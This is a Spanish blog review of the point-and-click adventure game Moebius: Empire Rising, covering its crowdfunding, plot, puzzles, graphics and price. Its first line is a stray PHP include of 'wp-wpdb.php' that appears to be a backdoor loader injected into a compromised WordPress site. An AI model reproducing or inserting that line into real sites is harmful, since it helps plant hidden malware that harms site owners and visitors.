if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Moebius: Empire Rising – La Fortaleza de LeChuck

Análisis Moebius: Empire Rising

Las aventuras gráficas han encontrado en las campañas de crowdfunding una vía de ser financiadas y ver la luz. Fue así como Moebius consiguió el apoyo de los aventureros, que confiaron en la experiencia de Jane Jensen. Moebius: Empire Rising es una aventura gráfica point&click de corte adulto, con cierto parecido a Broken Sword y con misterios que nos mantendrán enganchados de principio a fin.

moebius-empire-rising

El éxito del Kickstarter de Double Fine animó a Jane Jensen, creadora de Gabriel Knight, a iniciar un crowdfunding con la esperanza de alcanzar los 300.000 dólares para el desarrollo de dos aventuras: Moebius y el remake de Gabriel Knight: Sins of the Fathers. La cifra que se había marcado fue superada, y hoy, 15 de abril, ha sido lanzada la versión digital del esperado Moebius: Empire Rising.

Moebius comienza con un prólogo en forma de cómic. La acción se desarrolla en África, año 1987, y veremos varios acontecimientos que golpean sobre un niño de corta edad. Varias páginas después, aterrizamos en España en la actualidad, donde nuestro protagonista acude a una cita en una gran mansión para valorar varias obras de arte, pero la cosa se tuerce de tal manera que recibe una paliza de dos matones. A partir de aquí da comienzo el juego con Malachi Rector, que se ha recuperado de los golpes y regresa a su popular tienda de antigüedades en Manhattan para ponerse al día. Allí recibe un mensaje de un extraño hombre, quien requiere de su increíble talento e inteligencia. Los intentos de Malachi por recabar información sobre la compañía y el sujeto son en vano pero aún así decide acudir a la cita. El presidente de la oscura corporación, Amble Dexter, le ofrece un extraño trabajo: Tiene que viajar a Venecia para buscar una conexión histórica con una joven fallecida. ¿Qué pretende esta corporación llamada FITA? ¿Para qué quieren encontrar un personaje histórico que coincida con la víctima? Estos y otros misterios nos depara esta emocionante aventura.

moebius_empire_rising_2

Malachi tiene unas increíbles capacidades cognitivas que hacen que tan solo con la simple observación de un sujeto pueda conocer su carácter y pasado. Esto se nos planteará en forma de puzle para que descifremos aspectos nuevos de los personajes y los usemos en nuestro beneficio. Por ejemplo, veremos a un viejecita que es testigo directo del crimen y basándonos en su peinado, dedos callosos y vestimenta tendremos que eligir una respuesta de las tres que se plantean para cada rasgo identificativo. La verdad es que es bastante sencillo y al final la lógica manda sobre las otras dos.

moebius_empire_rising_3

A lo largo de Moebius: Empire Rising viajaremos a diferentes lugares de todo el globo, bien sea por nuestros clientes o por los diferentes trabajos que nos ofrece Amble Dexter. Durante nuestros viajes visitaremos personajes y veremos objetos que después de averiguar lo suficiente podremos relacionarlos con una época de la historia. En el caso de los personajes, buscaremos elementos de su vida que coincidan con personalidades históricas para saber más de ellos. Con los objetos, nos servirá para datarlos y conocer su autenticidad. La idea al comienzo es confusa, pero a medida que avanza la historia va cobrando sentido y es una vía alternativa de investigación, ademas de un repaso de historia del arte.

moebius_empire_rising_4

Cuando avanzamos un poco en el juego se nos plantean decisiones: ¿Salvar a un personaje o dejarlo en ese lugar a su suerte? ¿Contarle la verdad o no? ¿Ir solos o acompañados? Cabe decir que dependiendo de nuestra opción se desbloquean logros relacionados. Estas decisiones me llevan a suponer que existe un modo individual y un modo cooperativo, algo parecido a Indiana Jones and the Fate of Atlantis, por lo tanto, se puede vivir la aventura solo o acompañado. Yo he decidido que las cosas en compañía son más divertidas.

Lo primero que me gustó de Moebius: Empire Rising se encuentra en la configuración y se trata del cambio de tamaño de los subtítulos. Puede parecer una tontería pero en juegos con mucho texto es ideal algo así para no forzar la vista en exceso. Ahora mismo no recuerdo ningún otro juego con esta útil función. Otro de los avances que se van incorporando cada vez en más aventuras gráficas, es el doble click para saltar animaciones monótonas, y en el título que nos ocupa dispondremos de esta ventaja y así evitaremos largos paseos.

moebius_empire_rising_5

Los gráficos de Moebius: Empire Rising son correctos, y los entornos son detallados y bonitos. Además, frecuentemente va cambiando el ángulo de cámara para hacerlo todo más cinematográfico, con un importante peso de las cinemáticas en el desarrollo de la trama. El mayor problema del juego son las animaciones de los personajes, primitivas y torpes que estropean el resultado final.  En este aspecto ha habido una pequeña mejoría si lo comparamos con los otros juegos publicados por Phoenix Online, pero aún queda mucho camino por recorrer. Aún así Moebius tiene un buen número de detalles, además de la excelente trama, que nos hará disfrutar y difícilmente nos aburriremos. La interfaz es limpia, podremos abrir el inventario a la derecha y las funciones de nuestro smartphone, menús y sistema de pistas en la izquierda en el momento que deseemos. Los escenarios se ven vivos, recuerdo estar en una concurrida calle de Manhattan, y ver pasar la gente, los taxis, incluso estando dentro de la tienda. También se nos ofrece la oportunidad de llevar en determinados momentos a algún personaje secundario. Se nota el cariño que se ha puesto en ello.

moebius_empire_rising_6

En cuanto a los puzles, Moebius: Empire Rising no nos ofrece ningún desafío. Ya indicó Jane Jensen que se trataba de una aventura gráfica «casual», es decir, accesible para todo el mundo, para que hasta los jugadores más torpes pudieran disfrutar de su excelente historia. La mayoría de puzles que encontramos se resuelven usando y combinando objetos desde la lógica más pura, sin embargo, daremos con algunos rompecabezas aislados que requieren un poco más de ingenio. ¿Qué nos quedamos atascados? Pues podremos consultar desde nuestro smartphone el libro de pistas o utilizar la opción de señalar todos los objetos interaccionables. Ah, y se puede morir y no hay autoguardado. Cuidado con lo que hacéis por ahí. Sobre los objetos, comentar que solo se pueden coger en el momento indicado, normalmente cuando hemos descubierto lo suficiente como para necesitarlos. Esto evita saturar el inventario de toda la morralla que encontramos por el escenario sin saber su uso a corto plazo.

Moebius: Empire Rising es una aventura gráfica muy a tener en cuenta. El enfoque histórico de los enigmas y el cariño de Jane Jensen y su equipo están impresos en cada detalle. Con una recaudación mucho más baja que otras aventuras gráficas, Pinkerton Road ha logrado un juego con elementos originales, muy entretenido e inteligente. Si el idioma para ti no es un impedimento (está totalmente en inglés), échale un ojo. Puedes descargar la demo aquí, o fiándote de mi recomendación, comprar Moebius: Empire Rising en Steam por 27,99€.